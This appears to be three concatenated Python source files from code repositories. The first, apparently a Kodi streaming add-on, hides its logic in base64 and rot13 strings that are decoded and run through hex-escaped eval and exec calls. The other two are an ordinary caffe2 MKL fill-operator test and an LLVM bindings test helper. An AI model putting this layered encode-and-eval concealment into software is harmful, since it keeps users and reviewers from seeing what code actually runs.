ZXN0cmljdGlvbnMuY2x1Yicgbm90IGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViJywKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgX19idWlsdGluX18uQk9CX0JBU0VfRE9NQUlOKQogICAgICAgIGVsaWYgJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ3d3dy5ub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBfX2J1aWx0aW5fXy5CT0JfQkFTRV9ET01BSU4pCiAgICAgICAgZWxpZiAnbm9yZXN0cmljdGlvbnMuY2x1YicgaW4gdXJsIGFuZCAnbm9yZXN0cmljdGlvbnMuY2x1Yi9ub3Jlc3RyaWN0aW9ucy5jbHViJyBub3QgaW4gdXJsOgogICAgICAgICAgICB1cmwgPSB1cmwucmVwbGFjZSgnbm9yZXN0cmljdGlvbnMuY2x1YicsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICBlbGlmICdub3Jlc3RyaWN0aW9ucy5jbHViL25vcmVzdHJpY3Rpb25zLmNsdWInIGluIHVybDoKICAgICAgICAgICAgdXJsID0gdXJsLnJlcGxhY2UoJ25vcmVzdHJpY3Rpb25zLmNsdWIvbm9yZXN0cmljdGlvbnMuY2x1YicsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF9fYnVpbHRpbl9fLkJPQl9CQVNFX0RPTUFJTikKICAgICAgICByZXR1cm4gdXJsCgogICAgZGVmIGdldF9saW5rX21lc3NhZ2Uoc2VsZiwgKmFyZ3MpOgogICAgICAgIG1lc3NhZ2VzID0gWwogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnU2UgZGlzcG9uw612ZScsCiAgICAgICAgICAgICAgICAnU0QnOiAnT2JyYXMgbWFpcyBwcm92w6F2ZW
lzJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnSmVuIMOpIFlhIENvdXNpbicsCiAgICAgICAgICAgICAgICAnU0QnOiAnSmVuIG7Do28gw6kgWWEgQ291c2luJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnVmVyaWZpY2FuZG8gb3MgcHJpbmNpcGFpcyBzaXRlcycsCiAgICAgICAgICAgICAgICAnU0QnOiAnU2l0dGluZyBJbiBDaW5lbWEgUmVjb3JkaW5nJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOgogICAgICAgICAgICAgICAgJ0Vzc2EgcXVhbGlkYWRlIGVzdMOhIHNlbmRvIHByb2N1cmFkYSBwZWxvcyBwcmluY2lwYWlzIGhvbWVucywgcXVlbT8gVG9wIC4uLi4gSG9tZW5zIScsCiAgICAgICAgICAgICAgICAnU0QnOgogICAgICAgICAgICAgICAgJ0VzdGEgcXVhbGlkYWRlIMOpIHZlbmRpZGEgbmEgZXNxdWluYSBwb3IgdW0gY2FyYSBzb21icmlvJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnR29vZ2xlIEZpYmVyJywKICAgICAgICAgICAgICAgICdTRCc6ICdFc3BlcmFuZG8gcG9yIGNvbmV4w6NvIGRpYWwtdXAnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICfDk3RpbW8hIFZhbGUgYSBwZW5hIGVzcGVyYXInLAogICAgICAgICAgICAgICAgJ1NEJzogJ0JvbSBvIGJhc3RhbnRlLiBFdSBzw7MgcXVlcm8gYXNzaXN0aXInCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdCbHVSYXkgUXVhbGlkYWRlJywKICAgICAgICAgICAgICAgICdTRCc6ICdWSFMgUXVhbGlkYWRlJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnMTA4MHAgJywKICAgICAgICAgICAgICAgICdTRCc6ICdCYWl4YScKICAgICAgICAgICAgfSwKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgJ0hEJzogJ0V1IHByZWNpc28gdmVyIGVzc2UgZmlsbWUgbmEgbWFpcyBhbHRhIHF1YWxpZGFkZScsCiAgICAgICAgICAgICAgICAnU0QnOiAnQmFpeGEgcHJvdmF2ZWxtZW50ZSDDqSB1bWEgcG9yY2FyaWEsIGVudMOjbyB2YW1vcyBhcGVuYXMgYWNhYmFyIGNvbSBpc3NvJwogICAgICAgICAgICB9LAogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAnSEQnOiAnUGFyZWNlIHVtIE1hc2VyYXRpJywKICAgICAgICAgICAgICAgICdTRCc6ICcgUGFyZWNlIHVtIEZvcmQgRm9jdXMnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdTdXBlcm1vZGVsbyBRdWFsaWRhZGUnLAogICAgICAgICAgICAgICAgJ1NEJzogJyBQYXJlY2UgYSB2b3bDsyBUaGVsbWEnCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICdIRCc6ICdBUkInLAogICAgICAgICAgICAgICAgJ1NEJzogJ0FSRCcKICAgICAgICAgICAgfSwKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgJ0hEJzogJ01lcmMgbyBwaW7DoWN1bG8gZG8gYnJpbGhvJywKICAgICAgICAgICAgICAgICdTRCc6ICdPIEpvaG4gSGFycmlzb24gZGUgcXVhbGlkYWRlJwogICAgICAgICAgICB9LAogICAgICAgIF0KCiAgICAgICAgaWYgeGJtY2FkZG9uLkFkZG9uKCkuZ2V0U2V0dGluZygnZW5hYmxlX29mZmVuc2l2ZScpID09ICd0cnVlJzoKICAgICAgICAgICAgbWVzc2FnZXMuZXh0ZW5kKFsKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAnSEQnOiAnS2lja3MgQXNzISEnLAogICAgICAgICAgICAgICAgICAgICdTRCc6ICdHZXRzIGFzcyBraWNrZWQgcmVwZWF0ZWRseScKICAgICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgJ0hEJzogJ0Z1Y2tpbmcgUm9ja3MhIScsCiAgICAgICAgICAgICAgICAgICAgJ1NEJzogJ0Z1Y2tpbmcgU3Vja3MhIScKICAgICAgICAgICAgICAgIH0sCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgJ0hEJzogJ0JpZyBCb2RhY2lvdXMgQnJlYXN0cycsCiAgICAgICAgICAgICAgICAgICAgJ1NEJzogJ1NhZ2d5IE1pbGsgVGVhdHMnLAogICAgICAgICAgICAgICAgfSwKICAgICAgICAgICAgXSkKICAgICAgICByZXR1cm4gbWVzc2FnZXMKCiAgICBkZWYgZ2V0X3NlYXJjaGluZ19tZXNzYWdlKHNlbGYsIHByZXNldCk6CiAgICAgICAgbWVzc2FnZXMgPSBbCiAgICAgICAgICAgICcnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2FcJ2VzdGEgYXBlbmFzIG1vcmRlbmRvIHBhcmEgYmxvY2tidXN0ZXJzIG7Do28gc2Vyw6EgbWFpcyB1bSBzZWd1bmRvJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIGFkb3JtZWNldSBkdXJhbnRlIGVzdGUgZmlsbWUnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2FcJ0NvbGVjYW8gZGUgZmlsbWVzIFRWc3VwZXJ0dWdhIG7Do28gdGVtIGxpbWl0ZXMnLAogICAgICAgICAgICAnUGVzcXVpc2FuZG8gbmEgSW50ZXJuZXQgcGFyYSBzdWEgc2VsZWNhbycsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSB2aXUgbyBzZXUgZ29zdG8gZW0gZmlsbWVzIGUgZXN0YSBtdWl0byBkZXNhcG9udGFkbyAnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgY
WNoYSBxdWUgZWxlIHRlbSBhcXVlbGUgRFZEIHBvciBhcXVpJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIGRpeiBxdWUgdm9jw6ogZSB1bSBnZWVrIGRvIGNpbmVtYSBjb21vIGVsZScsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSBkaXogc2FpciBkbyB0d2l0dGVyIGUgZGVzZnJ1dGFyIGRlIHNldSBhZGRvbicsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSDDqSB1bSBhZGRvbiBwcm9jdXJhZG8gZW0gMTI1IHBhw61zZXMnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgZGlzc2UgcXVlIHNldSBnb3N0byBwb3IgZmlsbWVzIMOpIGRlIHByaW1laXJhIHF1YWxpZGFkZScsCiAgICAgICAgICAgICdRdWFuZG8gbyBUVnN1cGVydHVnYSBlc2NvbGhlIHVtIGZpbG1lLCBvcyBzZXJ2aWRvcmVzIHRyZW1lbSBkZSBtZWRvJywKICAgICAgICAgICAgJ0VsZXMgdGVtZW0gVFZzdXBlcnR1Z2EuIE7Do28gb3VjYSBvZGlhZG9yZXMnLAogICAgICAgICAgICAnVFZzdXBlcnR1Z2EgZGlzc2UgcXVlIGVsZSB0cmFiYWxoYSB0w6NvIGR1cm8gcGFyYSB2b2PDqiwgbyB1c3XDoXJpbyBmaW5hbCcsCiAgICAgICAgICAgICdUVnN1cGVydHVnYSBmYXogaXNzbyBwb3JxdWUgZWxlIGFtYSwgbsOjbyBwb3IgZ2Fuw6JuY2lhJywKICAgICAgICAgICAgJ0lzc28gbsOjbyDDqSBjcmFjayBkZSBUVnN1cGVydHVnYXMgYnV0dCwgw6kgc2V1IHRpdHVsYXIgcmVtb3RvJywKICAgICAgICAgICAgJ1RWc3VwZXJ0dWdhIC4uLiBFdSBzb3Ugc2V1IHBhaSAhIScsCiAgICAgICAgICAgICdFdSB2b3UgZmF6ZXIgdW1hIG9mZXJ0YSBhIFRWc3VwZXJ0dWdhIHF1ZSBlbGUgbsOjbyBwb2RlIHJlY3VzYXIuJywKICAgICAgICAgICAgJ0FxdWk'
destiny = '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coJHbL2uuozqyMS9mqUW1L3DcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOcMvOypT9wnS9wnTShM2IxVQjtL3WyLKEyMS90nJ1yBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtn29xnJ5aYzEioT9aXNbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPWfo2SxnJ5aVTMlo20tL2SwnTHfVTkcp3Dtoz90VTAbLJ5aMJDvXDbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtV3ugoPN9VUOcL2gfMF5fo2SxplugLKEwnSfvrT1fVy0cPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPO4oJjtCFOlMKAjo25mMF5wo250MJ50PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMF5woT9mMFtcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVaWyMaWyp2ucozptL29hqTIhqPVcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPO4oJjtCFOlMKAjo25mMF5wo250MJ50PvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMF5woT9mMFtcPvNtVPNtVPNtVPNtVPNtVPNtVPNtMKuwMKO0VRI4L2IjqTyiovOuplOyBtbtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVzAuL2uyVTIlpz9lBvNvVPftpzIjpvuyXFxXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtpzI0qKWhVUOcL2gfMF5fo2SxplugLKEwnSfvrT1fVy0cPvNtVPNtVPNtVPNtVTIfp2H6PvNtVPNtVPNtVPNtVPNtVPOeo2EcozphMT9fo2pbVzyhnKEcLJjtoT9uMPVcPvNtVPNtVPNtVPNtVPNtVPOlMKAjo25mMFN9VUWypKIyp3EmYzqyqPu1pzjfVUMypzyzrG1TLJkmMFxXVPNtVPNtVPNtVPNtVPNtVUugoPN9VUWyp3OioaAyYzAioaEyoaDXVP
NtVPNtVPNtVPNtVPNtVUWyp3OioaAyYzAfo3AyXPxXVPNtVPNtVPOcMvOho3DtrT1fBtbtVPNtVPNtVPNtVPO4Lz1wM3IcYxEcLJkiMltcYz5iqTyznJAuqTyiovtXVPNtVPNtVPNtVPNtVPNtVRSRER9BYzqyqRSxMT9hFJ5zoltvozSgMFVcYNbtVPNtVPNtVPNtVPNtVPNtVyAypaMypvO1ozEypvObnJqbVTkiLJDfVUElrFOuM2ScovVcPvNtVPNtVPNtVPNtVUWyqUIlovNvVtbtVPNtVPNtVTyhMz8tCFOXMJ5WqTIgXUugoP5mpTkcqPtaCTy0MJ0+WlyoZS0hp3OfnKDbWmkxnKV+WlyoZS0cPvNtVPNtVPNtL2SwnTIsqTygMFN9VTyhqPucozMiYzqyqPtvL2SwnTHvYPNlZGLjZPxcPvNtVPNtVPNtn29xnJ5aYzEioT9aXPWwLJAbMI90nJ1yBvNvVPftpzIjpvuwLJAbMI90nJ1yXFxXVPNtVPNtVPOwpzIuqTIxK3EcoJHtCFO0nJ1yYz1eqTygMFu0nJ1yYzqgqTygMFtcXDbtVPNtVPNtVUElrGbXVPNtVPNtVPNtVPNtn29xnJ5aYyWyoJ92MI9Tpz9gK1EuLzkyXPW4oJksL2SwnTHvYPO7PvNtVPNtVPNtVPNtVPNtVPNvqKWfVwbtqKWfYNbtVPNtVPNtVPNtVPO9XDbtVPNtVPNtVTI4L2IjqPOSrTAypUEco24fVTH6PvNtVPNtVPNtVPNtVTgiMTyhMl5xo2kiMltvETS0LJWup2HtMKWlo3V6VPVtXlOlMKOlXTHcXDbtVPNtVPNtVTgiMTyhMl5OMTEsIT9sITSvoTHbVaugoS9wLJAbMFVfVUfXVPNtVPNtVPNtVPNtVaIloPV6VUIloPjXVPNtVPNtVPNtVPNtVaugoPV6VUOcL2gfMF5xqJ1jplu4oJjcYaWypTkuL2HbVyjvVvjtVvpvXFjXVPNtVPNtVPNtVPNtVzAuL2uyK3EcoJHvBvOwLJAbMI90nJ1yYNbtVPNtVPNtVPNtVPNvL3WyLKEyMPV6VTAlMJS0MJEsqTygMDbtVPNtVPNtVU0cPvNtVPNtVPNtpzI0qKWhVUugoNb='
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
|
sf-wind/caffe2
|
refs/heads/master
|
caffe2/python/mkl/mkl_fill_op_test.py
|
4
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import hypothesis.strategies as st
from hypothesis import given, settings
import numpy as np
from caffe2.python import core, workspace
import caffe2.python.hypothesis_test_util as hu
import caffe2.python.mkl_test_util as mu
@unittest.skipIf(not workspace.C.has_mkldnn,
"Skipping as we do not have mkldnn.")
class MKLFillTest(hu.HypothesisTestCase):
@given(n=st.integers(1, 4), c=st.integers(1, 4),
h=st.integers(1, 4), w=st.integers(1, 4),
filler=st.sampled_from(
["XavierFill", "ConstantFill", "GaussianFill", "MSRAFill"]
),
seed=st.integers(5, 10),
**mu.gcs_cpu_mkl)
def test_mkl_fill(self, n, c, h, w, filler, seed, gc, dc):
op = core.CreateOperator(
filler,
[],
["Y"],
shape=[n, c, h, w],
)
for d in dc:
d.random_seed = seed
self.assertDeviceChecks(dc, op, [], [0])
if __name__ == "__main__":
import unittest
unittest.main()
|
zzxuanyuan/root-compressor-dummy
|
refs/heads/compressionbench
|
interpreter/llvm/src/bindings/python/llvm/tests/base.py
|
107
|
import os.path
import unittest
POSSIBLE_TEST_BINARIES = [
'libreadline.so.5',
'libreadline.so.6',
]
POSSIBLE_TEST_BINARY_PATHS = [
'/usr/lib/debug',
'/lib',
'/usr/lib',
'/usr/local/lib',
'/lib/i386-linux-gnu',
]
class TestBase(unittest.TestCase):
def get_test_binary(self):
"""Helper to obtain a test binary for object file testing.
FIXME Support additional, highly-likely targets or create one
ourselves.
"""
for d in POSSIBLE_TEST_BINARY_PATHS:
for lib in POSSIBLE_TEST_BINARIES:
path = os.path.join(d, lib)
if os.path.exists(path):
return path
raise Exception('No suitable test binaries available!')
get_test_binary.__test__ = False
def get_test_file(self):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), "test_file")
def get_test_bc(self):
return os.path.join(os.path.dirname(os.path.abspath(__file__)), "test.bc")
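# --- Illustrative sketch (not part of the original file) ---
# Concrete test cases subclass TestBase and call the helpers above; the
# test class and method names here are hypothetical:
#
#   class TestHelpers(TestBase):
#       def test_get_test_binary_exists(self):
#           path = self.get_test_binary()
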